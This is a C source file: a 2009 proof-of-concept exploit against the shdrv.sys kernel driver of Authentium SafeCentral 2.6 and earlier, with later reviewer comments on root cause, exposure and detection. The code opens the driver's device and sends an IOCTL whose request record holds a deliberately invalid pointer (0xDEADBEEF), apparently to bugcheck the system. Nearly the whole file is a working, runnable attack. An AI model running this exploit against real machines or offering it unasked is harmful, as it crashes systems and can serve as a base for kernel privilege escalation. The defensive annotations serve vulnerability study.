/* safecentral-unharden.c * * Copyright (c) 2009 by <mu-b@digit-labs.org> * * Authentium SafeCentral <= 2.6 shdrv.sys local kernel ring0 SYSTEM POC * by mu-b - Tue 1 Sep 2009 * * - Tested on: shdrv.sys 2.0.0.128 * * Compile: MinGW + -lntdll * * - this exploit is provided for educational purposes _only_. You are free * to use this code in any way you wish provided you do not work for, or * are associated in any way with Portcullis Computer Security Ltd. * * - Private Source Code -DO NOT DISTRIBUTE - * http://www.digit-labs.org/ -- Digit-Labs 2009!@$! */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
/*
 * Control code sent to the driver's device object.
 *
 * Decoded with the standard CTL_CODE layout, 0x00226003 is
 * DeviceType 0x22 (FILE_DEVICE_UNKNOWN), Function 0x800,
 * Access FILE_READ_ACCESS and Method 3 (METHOD_NEITHER).
 * With METHOD_NEITHER the I/O manager hands the caller's buffer addresses
 * to the driver without copying or validating them, so every check
 * (ProbeForRead/ProbeForWrite inside an exception handler) is the driver's
 * own responsibility.
 */
#define SAFECNTRL_IOCTL 0x00226003

/*
 * Request record passed as the IOCTL input buffer.
 *
 * The layout is the PoC author's view of what the driver expects; the
 * driver's own definition is not shown here.
 *
 * NOTE(review): the record carries two embedded user-mode pointers. Even a
 * driver that validates the outer buffer must validate these separately
 * before dereferencing them -- confirm against the driver's handler.
 */
struct ioctl_req
{
  DWORD action;   /* request selector; main() uses the value 8 */
  DWORD *args;    /* caller-supplied argument array */
  DWORD *result;  /* presumably where the driver stores its result -- TODO confirm */
};
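/*
 * Proof-of-concept trigger for the shdrv.sys IOCTL handler.
 *
 * Opens the \\.\ShDev device with GENERIC_READ, then issues SAFECNTRL_IOCTL
 * with a request whose `result` field is the deliberately invalid address
 * 0xDEADBEEF.  The closing message ("you didn't STOP the box") shows that
 * the author expects an affected driver to bugcheck instead of returning,
 * which suggests the handler uses the embedded pointer without probing it.
 *
 * Reviewer notes for defenders:
 *   - Root cause class: unvalidated user-mode pointer used in kernel mode.
 *     The driver-side fix is to probe the request record and each embedded
 *     pointer (ProbeForRead/ProbeForWrite under an exception handler) and
 *     to capture the record before acting on it.
 *   - Exposure: the PoC needs only a handle to the device, so the ACL on
 *     the device object decides which local users can reach the handler.
 *   - Detection: opens of \\.\ShDev by processes that are not part of the
 *     product, and bugchecks attributed to shdrv.sys, are the observable
 *     signals.
 *
 * Returns EXIT_SUCCESS if the IOCTL completes (the system did not stop),
 * EXIT_FAILURE if any Win32 call fails.
 */
int
main (int argc, char **argv)
{
  struct ioctl_req req;
  HANDLE hFile = INVALID_HANDLE_VALUE;
  OVERLAPPED olStruct;
  BOOL bResult;
  DWORD args[2], rlen;
  int status = EXIT_FAILURE;

  (void) argc;
  (void) argv;

  /* Zeroed up front so the cleanup path can test hEvent on every exit. */
  memset (&olStruct, 0, sizeof olStruct);

  printf ("Authentium SafeCentral <= 2.6 shdrv.sys local kernel ring0 SYSTEM PoC\n"
          "by: <mu-b@digit-labs.org>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\n\n");
  fflush (stdout);

  hFile = CreateFileA ("\\\\.\\ShDev", GENERIC_READ,
                       FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
                       OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL);
  if (hFile == INVALID_HANDLE_VALUE)
    {
      /* Report the Win32 error code; the original printed the HANDLE
       * itself with %d, which is a format/argument mismatch. */
      fprintf (stderr, "* CreateFileA failed, %lu\n",
               (unsigned long) GetLastError ());
      goto out;
    }

  /* args is handed over uninitialised, exactly as in the original. */
  memset (&req, 0, sizeof req);
  req.action = 8;
  req.args = args;
  req.result = (DWORD *) 0xDEADBEEF;  /* intentionally invalid address */

  /* Manual-reset, initially non-signalled event for the overlapped call. */
  olStruct.hEvent = CreateEventW (NULL, TRUE, FALSE, NULL);
  if (!olStruct.hEvent)
    {
      fprintf (stderr, "* CreateEventW failed\n");
      goto out;
    }

  bResult = DeviceIoControl (hFile, SAFECNTRL_IOCTL,
                             &req, sizeof req, NULL, 0, &rlen, &olStruct);
  if (!bResult)
    {
      fprintf (stderr, "* DeviceIoControl failed\n");
      goto out;
    }

  bResult = GetOverlappedResult (hFile, &olStruct, &rlen, 1);
  if (!bResult)
    {
      fprintf (stderr, "* GetOverlappedResult failed\n");
      goto out;
    }

  /* Reaching this point means the driver returned normally. */
  printf ("* hmmm, you didn't STOP the box?!?!\n");
  status = EXIT_SUCCESS;

out:
  /* Release both handles on every path; the original closed only hFile,
   * and only on success. */
  if (olStruct.hEvent)
    CloseHandle (olStruct.hEvent);
  if (hFile != INVALID_HANDLE_VALUE)
    CloseHandle (hFile);

  return status;
}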